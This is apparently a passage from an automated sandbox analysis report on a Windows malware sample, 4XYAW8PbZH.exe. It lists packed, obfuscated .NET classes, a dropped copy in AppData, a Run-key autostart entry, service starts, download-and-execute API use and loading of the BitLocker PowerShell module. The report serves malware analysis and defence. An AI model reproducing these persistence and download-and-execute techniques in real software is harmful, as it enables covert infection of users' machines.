                Source: 4XYAW8PbZH.exeStatic PE information: section name: .text entropy: 7.905744938169938
                Source: graias.exe.3.drStatic PE information: section name: .text entropy: 7.905744938169938
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, VVDsp5z0h3ueCBhMHI.csHigh entropy of concatenated method names: 'uIn7A4c5c4', 'cKd7sP29J8', 'PVJ7OPUjgm', 'GOt7RTbFRX', 'fRq7nLo8jY', 'DsO7yXYm8F', 'jfG7KvFoCV', 'Myv7ryJQZt', 'Xsw76AFOO9', 'Kyv7jAnZ5D'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JcP3CXbCj2MePxFw4t.csHigh entropy of concatenated method names: 'QoAogqc15s', 'e0foZWP9NT', 'rvLoE54nKf', 'xm2oHsaGlJ', 'UWSowSuwci', 'sO3o34FuNi', 'rGjouvpEx0', 'fYlobbE8aU', 'P16oDiReVp', 'WGloPIyo49'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, xIqYjAki73C3cKXD85.csHigh entropy of concatenated method names: 'mbH7H07iFW', 'cqN7w994hK', 'ar073Ob3xB', 'wGn7uSWQE6', 'Bt87fiZN8f', 'wJO7bL4K0j', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, r9CwgrmCq0iA7y8nJ9.csHigh entropy of concatenated method names: 'kmo10oA3WG', 'XF91kVnfgY', 'uD4JF8j06V', 'pS0JBFMV7N', 'IBk18L56x4', 'mwX15QL4Zw', 'FQX1MFhCAe', 'M7E14W3NRJ', 'otb1VZdwoy', 'kBj1GN1mkX'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, RIk7WQRjI599urvrYU.csHigh entropy of concatenated method names: 'fdr3ga9YYx', 'V2R3EC5bMN', 'HeQ3wmZs3A', 'F8g3uE54eo', 'axd3bC7mZl', 'bhQw2fCU0I', 'AtGwmfhcBv', 'Q91wXBbP8W', 'lZDw0CQDUh', 'XS5wvI0nGD'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, YyrH5xHV915ThCRfGa.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xOLWv2TDtE', 'y8rWkqnK6l', 'QGkWzCEIkm', 'Ro9oF4Ba7N', 'gbNoBhb6tG', 'xbcoWtMcYZ', 'OAiooghZRU', 'nE4ApMOscsGI89RvYjD'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, XZYmxvaX0mNFxC84I7.csHigh entropy of concatenated method names: 'BCOu6animg', 'qDIujWCwOM', 'QxtueC8Dn5', 'LywuUPvaA5', 'UcluqdNTZc', 'q2RuAlnaak', 'qMhuihgE1v', 'pkkusiJKe3', 'ab7uOBwqco', 'pX1uxKqnWF'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, S7guEaWiHrCoe6iT91.csHigh entropy of concatenated method names: 'WXqeUm90M', 'jLwUZjEem', 'FrnA6jFId', 'WScicf8OE', 'v2dO8kdkD', 'INkxIPV9m', 'tcUSWTHvQbeageBmqd', 'l1LITJQyVHatQptoum', 'dIlJm2d5V', 'v0j73y1qS'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, YMJvB8OTLB6H3cybAH.csHigh entropy of concatenated method names: 'Y0hHUedI8O', 'DuGHAgvPnO', 'a8rHsj6twY', 'FJnHOgNW5o', 'aOFHdNM4AY', 'dKLHInGRiR', 'BskH1vZj2A', 'NonHJVcBa7', 'El9Hfp8FFn', 'S6MH7wg6FD'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, gUDpoRBWcGZJdJ1xBgC.csHigh entropy of concatenated method names: 'ToString', 'wVZcsWakXq', 'jadcOJnm38', 'gywcx1XbJp', 'o9dcRepSIn', 'Ud6cnPo0m9', 'V7LcCYiLhC', 'V3ccyPJWQZ', 'EWbZkW6svpOjxZ482uU', 'IjLn5e6Es8fcoPHGwnA'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, ivEyq7BBJ6wHAHZOqFG.csHigh entropy of concatenated method names: 'EkX7kVEQfu', 'RCn7z45KMv', 'WcUcFO0E4b', 'G0bcBMMhvw', 'wuEcWPrMfa', 'iK2copKFXF', 'R0TctVlhJp', 'OmrcgXN0Xy', 'JlIcZTcJCr', 'HBfcEKWTaW'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, h2W2U5GjXycDmWoFtZ.csHigh entropy of concatenated method names: 'ToString', 'lIpI8tcxTA', 'WZmInRvcb3', 'RgeIC7a36r', 'dlaIyl29RT', 'ogeIK2VhUH', 'VqFIQbFToc', 'dmeIlQabpw', 'j5RIp5t8Sg', 'lQOIaKea0i'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, aZ6hBXs8b9snu0Ud4p.csHigh entropy of concatenated method names: 'Nm8E4IbjXI', 'EIqEV2l8ky', 'OxwEG3iQdT', 'Tf8EYDstEk', 'YG0E2Elp8q', 'VBtEmHKwxS', 'Bb5EX8pUrq', 'YTvE0rHEgl', 'bRAEvLQOc6', 'jkXEk9yqPO'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, JqlCJGEi2WaZVqGLKM.csHigh entropy of concatenated method names: 'Dispose', 'E11Bv6ly9v', 'w6nWnBkput', 'm0SpG3IOGJ', 'wFOBk7NNf2', 'iinBzceRpT', 'ProcessDialogKey', 'EcIWFODuZa', 'OOGWBdqpNj', 'gpjWW6IqYj'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, zTyVhKBtEs85eROFEAZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UvPLf6tnDA', 'SjxL7gbcHA', 'Nh5LcscBeV', 'NwVLLFOxAi', 'AVGLTSkgw1', 'RpALSjCKBu', 'WbGLrFtVeZ'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, SMVV3L4F0JhXJNHiOK.csHigh entropy of concatenated method names: 'CMLd99PMDt', 'KGld59TtAp', 'Gbjd4MXtxe', 'CWNdVMLJ9k', 'w66dnuB787', 'H62dCQZmaH', 'E5Edy82euB', 'pGhdKuESCb', 'HqddQRJXgR', 'yyRdlVUQeE'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, yWN2RNBFVEbJiQusUqV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJZ78tv2RX', 'UuJ75CRJyN', 'fTq7M7DOw0', 'sl7744RB62', 'uXL7VnrVXx', 'w5N7GeKCXV', 'ClH7YoW6y1'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, F2AUD4MkIbgrqWMk6a.csHigh entropy of concatenated method names: 'm6DNsmcgR1', 'zuKNOXlcc5', 'qweNRU0tDf', 'YHdNnabryD', 'e45NyOHpd2', 'n6nNKE1a8d', 'BtcNlbkj4a', 'DbMNp9IQUY', 'nPAN9F9P1f', 'JJFN83Y4Ky'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, rCZtm2XybO116ly9vS.csHigh entropy of concatenated method names: 'lH2fdSOK5m', 'Maqf1bTyMY', 'c1Hff1AjqB', 'iRafch2c9o', 'DV3fTmw8tK', 'N5Ifr6Ce8p', 'Dispose', 'Ig1JZnfLCG', 'WXxJEDfKsG', 'HKXJHYwP44'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, cliYwLYym59iuPZqLi.csHigh entropy of concatenated method names: 'rwS1PFgJy3', 'fNX1hl7y0n', 'ToString', 'XP31ZDrMSt', 'uq11EPnlEb', 'JrW1HoPI1N', 'EVd1wXXhoS', 'gJp13PCgTm', 'PTS1uIG4bP', 'tEH1bWqpmu'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, bJbHCUx5N9DTZH0CVI.csHigh entropy of concatenated method names: 'OCZwq9V76m', 'sPBwiaLpcs', 'xfeHCAOQkP', 'q3pHyrNZ4L', 'JGMHKEXG2j', 'OpmHQWKtVf', 'GQVHlnxpN5', 'AJdHpZoOZK', 'Oo4Hadb6LO', 'WRwH9K3R2p'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, pODuZav9OGdqpNjHpj.csHigh entropy of concatenated method names: 'b5cfR71syL', 'C8ffne1OYp', 'CNefCBt9DS', 'vNMfyqdoP8', 'XejfKLULKv', 'NK4fQRBfLi', 'xHiflw82dI', 'HdHfpahY8d', 'ubwfarPh8M', 'GHYf94Vubs'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, bX7HmQt2nvTKvcBjMt.csHigh entropy of concatenated method names: 'CoFBuZ6hBX', 'Ob9Bbsnu0U', 'OTLBPB6H3c', 'IbABhHBJbH', 'h0CBdVI4Ik', 'sWQBIjI599', 'fNZFNio9oDWep87ryH', 'qTndNdppOX47cgbn3x', 'W9MBB3sHWl', 'Il7BoaRHbM'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, li9XWxlVpTEWtsPVb9.csHigh entropy of concatenated method names: 'qIsuZvmgQY', 'cjNuHmER4j', 'Rcbu3nvF66', 'SJm3kApVE5', 'HGH3zEH7fq', 'atvuFTgIBq', 'SnvuBrNmbL', 'PNkuWRk6kF', 'BohuowZMa1', 'gdLutuUi9C'
                Source: 0.2.4XYAW8PbZH.exe.3a9f740.5.raw.unpack, WuxHU5nUKjLfJqY2HB.csHigh entropy of concatenated method names: 'jnvRl20MYkDGu7YaC9T', 'xS6gSE0iCKxHtvYY7XI', 'Eou3J20NrF', 'wl33f1OqNd', 'AMD37Kmplf', 'NCns6L0kqUGhOjM9yKK', 'uKERJb09L6iSUMZVWZl'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, VVDsp5z0h3ueCBhMHI.csHigh entropy of concatenated method names: 'uIn7A4c5c4', 'cKd7sP29J8', 'PVJ7OPUjgm', 'GOt7RTbFRX', 'fRq7nLo8jY', 'DsO7yXYm8F', 'jfG7KvFoCV', 'Myv7ryJQZt', 'Xsw76AFOO9', 'Kyv7jAnZ5D'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JcP3CXbCj2MePxFw4t.csHigh entropy of concatenated method names: 'QoAogqc15s', 'e0foZWP9NT', 'rvLoE54nKf', 'xm2oHsaGlJ', 'UWSowSuwci', 'sO3o34FuNi', 'rGjouvpEx0', 'fYlobbE8aU', 'P16oDiReVp', 'WGloPIyo49'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, xIqYjAki73C3cKXD85.csHigh entropy of concatenated method names: 'mbH7H07iFW', 'cqN7w994hK', 'ar073Ob3xB', 'wGn7uSWQE6', 'Bt87fiZN8f', 'wJO7bL4K0j', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, r9CwgrmCq0iA7y8nJ9.csHigh entropy of concatenated method names: 'kmo10oA3WG', 'XF91kVnfgY', 'uD4JF8j06V', 'pS0JBFMV7N', 'IBk18L56x4', 'mwX15QL4Zw', 'FQX1MFhCAe', 'M7E14W3NRJ', 'otb1VZdwoy', 'kBj1GN1mkX'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, RIk7WQRjI599urvrYU.csHigh entropy of concatenated method names: 'fdr3ga9YYx', 'V2R3EC5bMN', 'HeQ3wmZs3A', 'F8g3uE54eo', 'axd3bC7mZl', 'bhQw2fCU0I', 'AtGwmfhcBv', 'Q91wXBbP8W', 'lZDw0CQDUh', 'XS5wvI0nGD'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, YyrH5xHV915ThCRfGa.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xOLWv2TDtE', 'y8rWkqnK6l', 'QGkWzCEIkm', 'Ro9oF4Ba7N', 'gbNoBhb6tG', 'xbcoWtMcYZ', 'OAiooghZRU', 'nE4ApMOscsGI89RvYjD'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, XZYmxvaX0mNFxC84I7.csHigh entropy of concatenated method names: 'BCOu6animg', 'qDIujWCwOM', 'QxtueC8Dn5', 'LywuUPvaA5', 'UcluqdNTZc', 'q2RuAlnaak', 'qMhuihgE1v', 'pkkusiJKe3', 'ab7uOBwqco', 'pX1uxKqnWF'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, S7guEaWiHrCoe6iT91.csHigh entropy of concatenated method names: 'WXqeUm90M', 'jLwUZjEem', 'FrnA6jFId', 'WScicf8OE', 'v2dO8kdkD', 'INkxIPV9m', 'tcUSWTHvQbeageBmqd', 'l1LITJQyVHatQptoum', 'dIlJm2d5V', 'v0j73y1qS'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, YMJvB8OTLB6H3cybAH.csHigh entropy of concatenated method names: 'Y0hHUedI8O', 'DuGHAgvPnO', 'a8rHsj6twY', 'FJnHOgNW5o', 'aOFHdNM4AY', 'dKLHInGRiR', 'BskH1vZj2A', 'NonHJVcBa7', 'El9Hfp8FFn', 'S6MH7wg6FD'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, gUDpoRBWcGZJdJ1xBgC.csHigh entropy of concatenated method names: 'ToString', 'wVZcsWakXq', 'jadcOJnm38', 'gywcx1XbJp', 'o9dcRepSIn', 'Ud6cnPo0m9', 'V7LcCYiLhC', 'V3ccyPJWQZ', 'EWbZkW6svpOjxZ482uU', 'IjLn5e6Es8fcoPHGwnA'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, ivEyq7BBJ6wHAHZOqFG.csHigh entropy of concatenated method names: 'EkX7kVEQfu', 'RCn7z45KMv', 'WcUcFO0E4b', 'G0bcBMMhvw', 'wuEcWPrMfa', 'iK2copKFXF', 'R0TctVlhJp', 'OmrcgXN0Xy', 'JlIcZTcJCr', 'HBfcEKWTaW'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, h2W2U5GjXycDmWoFtZ.csHigh entropy of concatenated method names: 'ToString', 'lIpI8tcxTA', 'WZmInRvcb3', 'RgeIC7a36r', 'dlaIyl29RT', 'ogeIK2VhUH', 'VqFIQbFToc', 'dmeIlQabpw', 'j5RIp5t8Sg', 'lQOIaKea0i'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, aZ6hBXs8b9snu0Ud4p.csHigh entropy of concatenated method names: 'Nm8E4IbjXI', 'EIqEV2l8ky', 'OxwEG3iQdT', 'Tf8EYDstEk', 'YG0E2Elp8q', 'VBtEmHKwxS', 'Bb5EX8pUrq', 'YTvE0rHEgl', 'bRAEvLQOc6', 'jkXEk9yqPO'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, JqlCJGEi2WaZVqGLKM.csHigh entropy of concatenated method names: 'Dispose', 'E11Bv6ly9v', 'w6nWnBkput', 'm0SpG3IOGJ', 'wFOBk7NNf2', 'iinBzceRpT', 'ProcessDialogKey', 'EcIWFODuZa', 'OOGWBdqpNj', 'gpjWW6IqYj'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, zTyVhKBtEs85eROFEAZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UvPLf6tnDA', 'SjxL7gbcHA', 'Nh5LcscBeV', 'NwVLLFOxAi', 'AVGLTSkgw1', 'RpALSjCKBu', 'WbGLrFtVeZ'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, SMVV3L4F0JhXJNHiOK.csHigh entropy of concatenated method names: 'CMLd99PMDt', 'KGld59TtAp', 'Gbjd4MXtxe', 'CWNdVMLJ9k', 'w66dnuB787', 'H62dCQZmaH', 'E5Edy82euB', 'pGhdKuESCb', 'HqddQRJXgR', 'yyRdlVUQeE'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, yWN2RNBFVEbJiQusUqV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wJZ78tv2RX', 'UuJ75CRJyN', 'fTq7M7DOw0', 'sl7744RB62', 'uXL7VnrVXx', 'w5N7GeKCXV', 'ClH7YoW6y1'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, F2AUD4MkIbgrqWMk6a.csHigh entropy of concatenated method names: 'm6DNsmcgR1', 'zuKNOXlcc5', 'qweNRU0tDf', 'YHdNnabryD', 'e45NyOHpd2', 'n6nNKE1a8d', 'BtcNlbkj4a', 'DbMNp9IQUY', 'nPAN9F9P1f', 'JJFN83Y4Ky'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, rCZtm2XybO116ly9vS.csHigh entropy of concatenated method names: 'lH2fdSOK5m', 'Maqf1bTyMY', 'c1Hff1AjqB', 'iRafch2c9o', 'DV3fTmw8tK', 'N5Ifr6Ce8p', 'Dispose', 'Ig1JZnfLCG', 'WXxJEDfKsG', 'HKXJHYwP44'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, cliYwLYym59iuPZqLi.csHigh entropy of concatenated method names: 'rwS1PFgJy3', 'fNX1hl7y0n', 'ToString', 'XP31ZDrMSt', 'uq11EPnlEb', 'JrW1HoPI1N', 'EVd1wXXhoS', 'gJp13PCgTm', 'PTS1uIG4bP', 'tEH1bWqpmu'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, bJbHCUx5N9DTZH0CVI.csHigh entropy of concatenated method names: 'OCZwq9V76m', 'sPBwiaLpcs', 'xfeHCAOQkP', 'q3pHyrNZ4L', 'JGMHKEXG2j', 'OpmHQWKtVf', 'GQVHlnxpN5', 'AJdHpZoOZK', 'Oo4Hadb6LO', 'WRwH9K3R2p'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, pODuZav9OGdqpNjHpj.csHigh entropy of concatenated method names: 'b5cfR71syL', 'C8ffne1OYp', 'CNefCBt9DS', 'vNMfyqdoP8', 'XejfKLULKv', 'NK4fQRBfLi', 'xHiflw82dI', 'HdHfpahY8d', 'ubwfarPh8M', 'GHYf94Vubs'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, bX7HmQt2nvTKvcBjMt.csHigh entropy of concatenated method names: 'CoFBuZ6hBX', 'Ob9Bbsnu0U', 'OTLBPB6H3c', 'IbABhHBJbH', 'h0CBdVI4Ik', 'sWQBIjI599', 'fNZFNio9oDWep87ryH', 'qTndNdppOX47cgbn3x', 'W9MBB3sHWl', 'Il7BoaRHbM'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, li9XWxlVpTEWtsPVb9.csHigh entropy of concatenated method names: 'qIsuZvmgQY', 'cjNuHmER4j', 'Rcbu3nvF66', 'SJm3kApVE5', 'HGH3zEH7fq', 'atvuFTgIBq', 'SnvuBrNmbL', 'PNkuWRk6kF', 'BohuowZMa1', 'gdLutuUi9C'
                Source: 0.2.4XYAW8PbZH.exe.73d0000.8.raw.unpack, WuxHU5nUKjLfJqY2HB.csHigh entropy of concatenated method names: 'jnvRl20MYkDGu7YaC9T', 'xS6gSE0iCKxHtvYY7XI', 'Eou3J20NrF', 'wl33f1OqNd', 'AMD37Kmplf', 'NCns6L0kqUGhOjM9yKK', 'uKERJb09L6iSUMZVWZl'
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00406128 ShellExecuteW,URLDownloadToFileW,3_2_00406128
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeFile created: C:\Users\user\AppData\Roaming\Graias\graias.exeJump to dropped file

                Boot Survival

                barindex
                Creates autostart registry keys with suspicious names
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,3_2_00419BD4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9Jump to behavior

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,3_2_0041BCF3
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
